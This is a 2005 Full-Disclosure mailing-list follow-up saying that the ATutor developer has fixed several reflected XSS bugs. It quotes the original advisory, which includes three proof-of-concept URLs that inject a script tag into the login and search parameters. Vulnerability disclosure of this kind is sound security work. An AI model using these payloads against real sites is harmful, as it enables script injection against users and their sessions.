Just to let all of you know, after i shared this bug (ATutor 1.5.1 and prior multiple XSS Vulnerabilities) with you all, i just received an email today from the developer of this product in reply to the notification i sent him indicating the weaknesses. He has assured me that the bugs have been fixed and the fixes will be included in the next release of atutor which is scheduled sometime later.
On 8/18/05, h4cky0u <[EMAIL PROTECTED]> wrote: > ATutor 1.5.1 and prior multiple XSS Vulnerabilities > > SEVERITY: > ========= > Medium > > SOFTWARE: > ========= > ATutor 1.5.1 > http://www.atutor.ca/ > > INFO: > ===== > ATutor 1.5.1 is a web based education portal. > > DESCRIPTION: > ============ > The system is vulnerable to various XSS attacks: > > > --==XSS==-- > > Some examples - > > http://localhost/tour/login.php?course="><script>alert('Matrix_Killer > r0X');</script> > > http://localhost/tour/search.php?search=1&search=1&words="><script>alert('There > is no other place like > 127.0.0.1');</script>&include=all&find_in=all&display_as=pages > > http://localhost/tour/search.php?search=1&words="><script>alert('Found > By > matrix_killer');</script>&include=all&find_in=all&display_as=pages&submit=Search > > VENDOR STATUS: > ============== > Vendor was contacted but no response received till date. > > CREDITS: > ======== > This vulnerability was discovered and researched by > matrix_killer of h4cky0u Security Forums. > > mail : matrix_k at abv.bg > > web : http://www.h4cky0u.org > > > Co-Researcher: > h4cky0u of h4cky0u Security Forums. > > mail : h4cky0u at gmail.com > > web : http://www.h4cky0u.org > > Greets to all omega-team members + krassswr,EcLiPsE and all who support us !!! > > ORIGINAL: > ========= > http://h4cky0u.org/viewtopic.php?t=2094 > > -- > http://www.h4cky0u.org > (In)Security at its best... > -- http://www.h4cky0u.org (In)Security at its best... _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/